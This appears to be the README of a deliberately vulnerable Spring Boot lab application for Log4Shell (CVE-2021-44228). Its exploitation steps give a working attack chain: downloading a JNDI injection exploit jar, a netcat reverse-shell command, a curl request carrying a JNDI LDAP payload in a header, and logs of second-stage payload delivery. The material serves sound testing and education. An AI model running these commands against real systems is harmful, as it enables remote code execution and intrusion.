/log4shell-vulnerable-app

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Primary LanguageJavaApache License 2.0Apache-2.0

Log4Shell sample vulnerable application (CVE-2021-44228)

This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181.

Running the application

Run it:

Build it yourself (you don't need any Java-related tooling):

docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

Exploitation steps

Note: This is highly inspired from the original LunaSec advisory. Run at your own risk, preferably in a VM in a sandbox environment.

Update (Dec 13th): The JNDIExploit repository has been removed from GitHub (presumably, not by GitHub). Just append web.archive.org in front of the JNDIExploit download URL below to use the version cached by the Wayback Machine.

wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C nc <privateIP> 8083 -e /bin/sh -A <privateIP>
  • Then, trigger the exploit using:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/<randomString>}'
  • Then, listen from the attacking machine on the port we want to receive the connection
nc -lvp 8083
  • Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:
2021-12-15 10:42:16 [LDAPSERVER] >> Send LDAP reference result for lcogih redirecting to http://54.243.12.192:8180/ExecTemplateJDK8.class
2021-12-15 10:42:16 [JETTYSERVER]>> Log a request to http://54.243.12.192:8180/ExecTemplateJDK8.class
  • To confirm that the code execution was successful, notice the shell opened with the attacker machine:

Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Contributors

@christophetd @rayhan0x01